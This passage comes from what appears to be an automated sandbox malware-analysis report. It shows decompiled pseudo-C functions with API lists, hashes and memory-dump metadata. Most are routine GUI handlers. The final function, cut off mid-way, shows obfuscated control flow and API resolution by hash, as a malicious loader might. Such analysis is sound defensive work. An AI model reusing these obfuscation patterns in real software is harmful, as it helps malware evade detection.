									__eflags = _t126;
									if(_t126 == 0) {
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
									}
									_t127 =  *((intOrPtr*)(_t215 + 8));
									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
									 *(_t215 - 0x28) =  *(_t127 + 0x14);
									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
									E00406330(_t215 - 0x80, 0, 0x2c);
									_t221 = _t220 + 0xc;
									 *(_t215 - 0x80) = 0x28;
									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
									 *(_t215 - 0x1c) = _t116;
									asm("sbb ecx, ecx");
									_t182 =  ~(_t116 + 1) & _t198;
									__eflags =  *(_t211 + 0xd4) - _t116;
									 *(_t215 - 0x14) = _t182;
									if( *(_t211 + 0xd4) != _t116) {
										L33:
										__eflags = _t116 - 0xffffffff;
										if(_t116 == 0xffffffff) {
											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
											L42:
											E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											__eflags =  *(_t211 + 0xd8) - 0x28;
											_t91 = _t211 + 0xd8; // 0xd8
											_t200 = _t91;
											if( *(_t211 + 0xd8) >= 0x28) {
												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
											}
											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
											_t183 = 0xb;
											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
											goto L45;
										}
										_t186 = 0xb;
										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
										_t221 = _t221 + 0xc;
										_t188 =  *(_t215 - 0x10);
										 *(_t215 - 0x50) = _t141;
										__eflags =  *(_t188 + 0x24) & 0x00000400;
										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
											_t150 = _t141 | 0x00000020;
											__eflags = _t150;
											 *(_t215 - 0x50) = _t150;
										}
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
										__eflags =  *(_t215 - 0x79) & 0x00000040;
										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
											L38:
											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
											_t145 =  *(_t215 - 0x10);
											__eflags =  *(_t145 + 0x24) & 0x00000400;
											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
											}
											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
											goto L41;
										} else {
											_t149 = E00414D5B( *(_t215 - 0x10));
											__eflags = _t149;
											if(_t149 == 0) {
												L41:
												_t211 =  *((intOrPtr*)(_t215 - 0x18));
												goto L42;
											}
											goto L38;
										}
									} else {
										__eflags =  *(_t211 + 0xd0) - _t182;
										if( *(_t211 + 0xd0) != _t182) {
											goto L33;
										}
										__eflags =  *(_t198 + 0x25) & 0x00000004;
										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
											__eflags = _t116 - 0xffffffff;
											if(_t116 != 0xffffffff) {
												_t116 = E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											}
										} else {
											GetCursorPos(_t215 - 0x20);
											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
										}
										L45:
										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
											__eflags =  *(_t215 - 0x60);
											if( *(_t215 - 0x60) == 0) {
												_t116 = E004062E0( *((intOrPtr*)(_t215 - 0x5c)));
											}
										}
										goto L78;
									}
								} else {
									__eflags = _t169;
									if(_t169 != 0) {
										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
									}
									goto L78;
								}
							}
							_t160 = E00404FFE(_t169);
							__eflags = _t160 -  *(_t215 - 0x14);
							if(_t160 !=  *(_t215 - 0x14)) {
								 *((intOrPtr*)( *_t169 + 0x58))();
								 *((intOrPtr*)( *_t169 + 4))(1);
								_t169 = 0;
								__eflags = 0;
								 *(_t211 + 0xcc) = 0;
							}
							__eflags = _t169;
							if(_t169 != 0) {
								goto L25;
							} else {
								goto L19;
							}
						} else {
							__eflags = _t116;
							if(_t116 == 0) {
								_t116 = E00425C92(0x4397cc, E0042440D);
								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
							}
							goto L78;
						}
					}
				} else {
					L50:
					__eflags =  *(_t198 + 0x24) & 0x00000401;
					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
						L78:
						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
						return _t116;
					}
					_push( *_t167);
					while(1) {
						_t116 = E00413740(_t215);
						__eflags = _t116;
						if(_t116 == 0) {
							break;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							L57:
							__eflags = _t208 - 0x100;
							if(_t208 < 0x100) {
								L59:
								__eflags = _t208 - 0x104;
								if(_t208 < 0x104) {
									L62:
									_t116 = 0;
									__eflags = 0;
									L63:
									__eflags =  *(_t198 + 0x25) & 0x00000004;
									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
										goto L78;
									}
									__eflags = _t116;
									if(_t116 != 0) {
										L77:
										_t116 = E00414026(_t116);
										goto L78;
									}
									__eflags = _t208 - 0x201;
									if(_t208 == 0x201) {
										goto L77;
									}
									__eflags = _t208 - 0x203;
									if(_t208 == 0x203) {
										goto L77;
									}
									__eflags = _t208 - 0x204;
									if(_t208 == 0x204) {
										goto L77;
									}
									__eflags = _t208 - 0x206;
									if(_t208 == 0x206) {
										goto L77;
									}
									__eflags = _t208 - 0x207;
									if(_t208 == 0x207) {
										goto L77;
									}
									__eflags = _t208 - 0x209;
									if(_t208 == 0x209) {
										goto L77;
									}
									__eflags = _t208 - 0xa1;
									if(_t208 == 0xa1) {
										goto L77;
									}
									__eflags = _t208 - 0xa3;
									if(_t208 == 0xa3) {
										goto L77;
									}
									__eflags = _t208 - 0xa4;
									if(_t208 == 0xa4) {
										goto L77;
									}
									__eflags = _t208 - 0xa6;
									if(_t208 == 0xa6) {
										goto L77;
									}
									__eflags = _t208 - 0xa7;
									if(_t208 == 0xa7) {
										goto L77;
									}
									__eflags = _t208 - 0xa9;
									if(_t208 != 0xa9) {
										goto L78;
									}
									goto L77;
								}
								__eflags = _t208 - 0x107;
								if(_t208 > 0x107) {
									goto L62;
								}
								L61:
								_t116 = 1;
								goto L63;
							}
							__eflags = _t208 - 0x108;
							if(_t208 <= 0x108) {
								goto L61;
							}
							goto L59;
						}
						__eflags =  *(_t116 + 0x24) & 0x00000401;
						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t116 + 0x1c)));
					}
					__eflags = _t116 - _t198;
					if(_t116 != _t198) {
						goto L78;
					}
					goto L57;
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00410E0A
GetKeyState.USER32(00000001), ref: 00410E57
GetKeyState.USER32(00000002), ref: 00410E64
GetKeyState.USER32(00000004), ref: 00410E71
GetParent.USER32(?), ref: 00410E92
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00410F6C
SendMessageA.USER32(?,00000408,00000000,?), ref: 00410FB0
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 00410FC8
ScreenToClient.USER32 ref: 00410FE4
GetCursorPos.USER32(?), ref: 0041103B
SendMessageA.USER32(?,00000412,00000000,?), ref: 00411059
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004110BB
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 004110DE
SendMessageA.USER32(?,00000411,00000001,00000028), ref: 004110FA
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041110D
SendMessageA.USER32(?,00000405,00000000,000000D8), ref: 00411139
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00411187
GetParent.USER32(?), ref: 004111B8

Strings

(, xrefs: 00410FFF
@, xrefs: 004110C1
(, xrefs: 00410F97

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
String ID: ($($@
API String ID: 986702660-2846432479
Opcode ID: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction ID: 13d5465373c71cfe337dff1ba131fcf840a9d493356aa9c13fb6cf6503e8bb35
Opcode Fuzzy Hash: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction Fuzzy Hash: 00C1A671A00315ABDF249F94CC85BEEBB75AF08704F10412BEB15BB2E1D7B898C58B59

Uniqueness

Uniqueness Score: -1.00%

Function 00417B29, Relevance: 12.1, APIs: 8, Instructions: 72
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00417B29() {
				CHAR* _t29;
				CHAR* _t36;
				void* _t38;
				CHAR* _t47;
				void* _t53;

				E00406520(E0042A77C, _t53);
				_t47 =  *(_t53 + 8);
				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
					_t29 =  *0x436980; // 0x436994
					 *(_t53 + 8) = _t29;
					_push(_t53 + 8);
					 *(_t53 - 4) = 0;
					E00417BF9(_t53, _t47);
					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
							CharUpperA(_t47);
						}
						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
							if(_t38 != 0xffffffff) {
								FindClose(_t38);
								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
							}
						}
						_push(1);
						_pop(0);
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E00416AEC(_t53 + 8);
					_t36 = 0;
				} else {
					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}

APIs

__EH_prolog.LIBCMT ref: 00417B2E
GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00417B8F
CharUpperA.USER32(?), ref: 00417BA0
FindFirstFileA.KERNEL32(?,?), ref: 00417BB6
FindClose.KERNEL32(00000000), ref: 00417BC2
lstrcpyA.KERNEL32(?,?), ref: 00417BD2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction ID: d6ea0ce2269d815b5d4983ac84d4510317191ca485f23a24ef5020b763cd6ff7
Opcode Fuzzy Hash: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction Fuzzy Hash: 71215C71A04119ABCB209F61DC48EEF7F7CEF05768F008166F919E61A0D7349A46CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E95F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
keyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041E95F(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v36;
				signed char _v65;
				char _v72;
				void* _t58;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr* _t113;

				_t110 = _a4;
				_t113 = __ecx;
				if(E00414007(__ecx, _t110) != 0) {
					L38:
					_t58 = 1;
					return _t58;
				}
				_t111 =  *((intOrPtr*)(_t110 + 4));
				_v20 = E00404FFE(__ecx);
				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
					if(_t111 < 0x200 || _t111 > 0x209) {
						if(_t111 < 0xa0 || _t111 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E004249C4();
						_t67 = _a4;
						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
						_v28.x =  *(_t67 + 0x14);
						ScreenToClient( *(_t113 + 0x1c),  &_v28);
						E00406330( &_v72, 0, 0x2c);
						_v72 = 0x28;
						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
						if(_v36 != 0xffffffff) {
							E004062E0(_v36);
						}
						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							if(_t111 != 0x201 && GetKeyState(1) < 0) {
								_v8 =  *((intOrPtr*)(_v16 + 0x104));
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							if(GetKeyState(1) >= 0 || _v12 != 0) {
								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
								KillTimer( *(_t113 + 0x1c), 0xe001);
							}
							goto L29;
						} else {
							if(_t111 != 0x202) {
								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
								} else {
									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
										L29:
										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
										goto L30;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E0041E722(_t113);
								}
								goto L29;
							}
							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L20;
						}
					}
				} else {
					L30:
					_t60 = E00414DCC(_t113);
					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
						if(_v20 == 0) {
							L36:
							return E00415EEB(_a4);
						} else {
							goto L34;
						}
						while(1) {
							L34:
							_t112 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
								goto L38;
							}
							_t64 = E00414C6C(_t112);
							_v20 = _t64;
							if(_t64 != 0) {
								continue;
							}
							goto L36;
						}
						goto L38;
					} else {
						return 0;
					}
				}
			}

APIs

Part of subcall function 00404FFE: GetParent.USER32(?), ref: 00405008

ScreenToClient.USER32 ref: 0041E9E9
GetKeyState.USER32(00000001), ref: 0041EA46
GetKeyState.USER32(00000001), ref: 0041EA98
GetKeyState.USER32(00000001), ref: 0041EACE
KillTimer.USER32(?,0000E001), ref: 0041EAF3

Strings

(, xrefs: 0041EA04

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: State$ClientKillParentScreenTimer
String ID: (
API String ID: 2757461879-3887548279
Opcode ID: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction ID: 933066e1b9ae1ffc9999b2effe157d6391a28475e321b0032f1d86925bea9953
Opcode Fuzzy Hash: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction Fuzzy Hash: 09518179A00205DBDF24DB96C488BEE7BB1AF44354F14006AED16A72D1C7B869C2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00422488, Relevance: 10.6, APIs: 7, Instructions: 67
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00422488(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5
SendMessageA.USER32(00000000,0000020A,?,?), ref: 00422504
GetParent.USER32(00000000), ref: 0042250D

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction ID: 20f266b1a498cc3956224d16169f9dc1dc704df93882e012ad9005a8c3fefddb
Opcode Fuzzy Hash: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction Fuzzy Hash: A4110D32B00334BFEB502BA5AD48EAA7798EB14794F904137FE41D7250DBF49C4256E4

Uniqueness

Uniqueness Score: -1.00%

Function 00422473, Relevance: 7.6, APIs: 5, Instructions: 52
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00422473(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t33;
				void* _t40;
				int _t43;
				struct HWND__* _t47;
				void* _t49;

				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
				_push(_t49);
				_push(0x98);
				_push(__ebx);
				_t40 = 0x98;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t47 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t47 != 0) {
					_t43 = _a4 << 0x10;
					do {
						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
						_t47 = GetParent(_t47);
					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
				} else {
					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t33;
			}

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: State$DesktopFocusMessageSendWindow
String ID:
API String ID: 2814764316-0
Opcode ID: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction ID: b57d560b4246ca497f525dd7341a5897b5c585060d52b80c51f82830bbc2b57b
Opcode Fuzzy Hash: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction Fuzzy Hash: 4C012032B003257FEB102B94ED45FA97798EB147A4F904437FE42D7191EAF8AC4396A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041580E, Relevance: 6.0, APIs: 4, Instructions: 38
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041580E(void* __ecx) {
				void* _t11;
				void* _t12;
				void* _t16;

				_t12 = __ecx;
				if((E00416528(__ecx) & 0x40000000) != 0) {
					L6:
					return E004136A7(_t12);
				}
				_t16 = E00404DAE();
				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
					_t11 = 1;
					return _t11;
				}
			}

0x00415811
0x0041581d
0x00415865
0x00000000
0x00415867
0x00415824
0x00415828
0x00000000
0x0041584b
0x0041585a
0x00415862
0x00000000
0x00415862

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetKeyState.USER32(00000010), ref: 00415832
GetKeyState.USER32(00000011), ref: 0041583B
GetKeyState.USER32(00000012), ref: 00415844
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041585A

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction ID: 667728aae4084d5946ddf495d1d29dbc27f199ee829e175ed2889692379dfdac
Opcode Fuzzy Hash: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction Fuzzy Hash: 47F0E232740746E5E63036931C42FD913144FC0BD4F45083AB701AE1D18A9988E30278

Uniqueness

Uniqueness Score: -1.00%

Function 02271FB0, Relevance: 4.0, Strings: 3, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02271FB0(intOrPtr* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t26;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t40;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t54;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr _t60;
				intOrPtr _t66;
				intOrPtr* _t85;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				void* _t99;

				_t58 = __ecx;
				_t88 =  *((intOrPtr*)(_t96 + 0x1c));
				_t95 = __edx;
				 *((intOrPtr*)(_t96 + 0x10)) = __ecx;
				_t57 = 0;
				_t26 = 0x1e37d88e;
				while(1) {
					L1:
					_t91 =  *((intOrPtr*)(_t96 + 0x18));
					goto L2;
					do {
						while(1) {
							L2:
							_t98 = _t26 - 0x27643e76;
							if(_t98 > 0) {
								break;
							}
							if(_t98 == 0) {
								_t26 = 0x1f9931a7;
								continue;
							} else {
								_t99 = _t26 - 0x1f9931a7;
								if(_t99 > 0) {
									__eflags = _t26 - 0x234da148;
									if(_t26 == 0x234da148) {
										__eflags = _t57;
										if(_t57 == 0) {
											E02274250(_t57,  *_t95);
										}
										goto L44;
									} else {
										__eflags = _t26 - 0x23930c9c;
										if(_t26 != 0x23930c9c) {
											goto L40;
										} else {
											_t44 =  *0x227e120;
											__eflags = _t44;
											if(_t44 == 0) {
												_t44 = E02273E80(_t57, E02273F20(0x667fdee), 0x207605dd, _t95);
												 *0x227e120 = _t44;
											}
											_t60 =  *0x227e2e4; // 0x4d8ea8
											_t45 =  *_t44( *((intOrPtr*)(_t96 + 0x28)), _t91, 0x60,  *((intOrPtr*)(_t60 + 0x1c)), 0, 0);
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											__eflags = _t45;
											_t26 = 0x3134f996;
											_t57 =  !=  ? 1 : _t57;
											continue;
										}
									}
								} else {
									if(_t99 == 0) {
										_t47 =  *0x227dea8;
										_t93 =  *((intOrPtr*)(_t58 + 4)) + 0xffffff8c;
										 *((intOrPtr*)(_t95 + 4)) = _t93;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E02273E80(_t57, E02273F20(0xbb398380), 0x97f883e, _t95);
											 *0x227dea8 = _t47;
										}
										_t89 =  *_t47();
										_t49 =  *0x227dcec;
										__eflags = _t49;
										if(_t49 == 0) {
											_t49 = E02273E80(_t57, E02273F20(0xbb398380), 0xe9233692, _t95);
											 *0x227dcec = _t49;
										}
										_t50 =  *_t49(_t89, 8, _t93);
										 *_t95 = _t50;
										__eflags = _t50;
										if(_t50 == 0) {
											L44:
											return _t57;
										} else {
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											_t91 =  *_t58;
											 *((intOrPtr*)(_t96 + 0x18)) = _t91;
											_t88 =  *((intOrPtr*)(_t58 + 4)) - 0x74;
											 *((intOrPtr*)(_t96 + 0x1c)) = _t91 + 0x74;
											_t26 = 0x3ac56b1d;
											continue;
										}
									} else {
										if(_t26 == 0x72b6082) {
											_t54 =  *0x227daac;
											_t94 =  *_t95;
											__eflags = _t54;
											if(_t54 == 0) {
												_t54 = E02273E80(_t57, E02273F20(0xe66945e6), 0x70f7b8ec, _t95);
												 *0x227daac = _t54;
											}
											 *_t54(_t94,  *((intOrPtr*)(_t96 + 0x20)), _t88);
											_t58 =  *((intOrPtr*)(_t96 + 0x1c));
											_t96 = _t96 + 0xc;
											_t26 = 0x3126cae3;
											goto L1;
										} else {
											if(_t26 != 0x1e37d88e) {
												goto L40;
											} else {
												_t26 = 0x323ed498;
												continue;
											}
										}
									}
								}
							}
							L45:
						}
						__eflags = _t26 - 0x323ed498;
						if(__eflags > 0) {
							__eflags = _t26 - 0x3ac56b1d;
							if(_t26 != 0x3ac56b1d) {
								goto L40;
							} else {
								_t28 =  *0x227def8;
								__eflags = _t28;
								if(_t28 == 0) {
									_t28 = E02273E80(_t57, E02273F20(0x667fdee), 0xb11f83b0, _t95);
									 *0x227def8 = _t28;
								}
								_t66 =  *0x227e2e4; // 0x4d8ea8
								_t29 =  *_t28( *((intOrPtr*)(_t66 + 0x18)), 0, 0, _t96 + 0x14);
								_t58 =  *((intOrPtr*)(_t96 + 0x10));
								asm("sbb eax, eax");
								_t26 = ( ~_t29 & 0xe3ddbf3a) + 0x234da148;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								__eflags =  *((intOrPtr*)(_t58 + 4)) - 0x74;
								if( *((intOrPtr*)(_t58 + 4)) < 0x74) {
									goto L44;
								} else {
									_t26 = 0x27643e76;
									goto L2;
								}
							} else {
								__eflags = _t26 - 0x3126cae3;
								if(_t26 == 0x3126cae3) {
									_t85 =  *0x227df8c;
